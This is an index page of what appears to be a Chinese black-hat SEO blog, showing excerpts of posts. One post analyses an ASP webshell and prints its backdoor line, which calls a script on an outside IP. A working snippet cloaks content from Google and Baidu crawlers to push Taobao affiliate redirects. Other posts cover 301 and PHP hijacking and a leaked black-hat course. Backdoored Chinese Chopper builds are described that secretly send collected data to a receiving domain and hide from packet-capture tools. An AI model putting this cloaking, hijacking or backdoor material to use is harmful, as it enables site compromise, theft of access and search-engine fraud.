黑吃黑:分析一款asp webshell后门箱子

2017年05月21日  No comment

在群内看到有人分享免杀木马。第一眼感觉哪有这种好事,于是下载下来开始分析。用编辑器打开开始读代码。我们可以看到第三行代码如下:代码为:UserPass="admin123"  '密码一般后门分好多种,直接跟随UserPass变量,直接爆菊。代码内容为:j"<script src=""http://121.50.168.146:8080/api.asp?url="&server.URLE
阅读全文 »

在脚本中ASCII码的玩法

2017年05月15日  No comment

ASCII(American Standard Code for Information Interchange,美国信息互换标准代码)是基于拉丁字母的一套电脑编码系统,主要用于显示现代美式英语,并等同于国际标准ISO/IEC 646。标准ASCII编码可表示128个字符,包括大小写拉丁字母,阿拉伯数字、英语标点符号,以及在美式英语中使用的特殊控制字符。另有扩展版本的ASCII编码添加了一些西欧字符,可以表示255个字符,但是西欧国家间对扩充的字符定义不一致,并不是通用版本。用PHP中chr函数
阅读全文 »

PHP Chr函数

2017年05月15日  No comment

PHP chr() 函数从指定的 ASCII 值返回字符。


阅读全文 »

黑帽脚本开发特训课程

2017年05月14日  4 Comments

两年前曾做过一次黑帽就业培训,本是内训。内部课程教材被自己人流放出去。


阅读全文 »

蜘蛛劫持作淘客跳转小例子

2017年05月14日  No comment

核心代码如下:

header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
   echo '';
}
else
{
   echo "淘宝客地址";
}

阅读全文 »

另类301劫持代码分析

2017年05月14日  1 Comment

开始分析:

在主页include 引入文件 test.php

<?php
include("index.php")
?>
<html>
<body>
这里是index主页内容
</body>
</html>

阅读全文 »

php代码劫持分析与整理

2017年05月14日  No comment

无意间看到一php代码劫持

代码如下


阅读全文 »

Hello 2017

2017年05月14日  No comment

Hello 2017久别2年
阅读全文 »

中国菜刀后门+WEBSHELL箱子

2015年10月01日  No comment

菜刀版本一、老版中国菜刀二、红色中国菜刀(菜刀官网发布的最后一版)三、xise菜刀(批量操作资源)需要配置VPS一台收信域名后门详情1、程序启动10秒后,后门开始运行,读取需要的数据提交到收信端。2、之后每隔10秒检查是否有新的数据,有新的数据则发送。3、后门过滤了抓包软件,如果有抓包软件在运行,则不会发送任何数据。4、具体收信地址、抓包软件列表修改方法参照以下说明。5、后门的整个通讯过程是加密的。反抓包介绍程序都已增加策略。启动10秒后运行,每隔10秒检查是否有新数据。通讯过程全部加密。已过滤
阅读全文 »

黑帽之王 - 黑帽自动化平台

2015年10月01日  No comment

详细介绍项目已暂停配置参数项目已暂停实物截图文章禁止转载!违者必究!黑帽博客(www.heimao.org)
阅读全文 »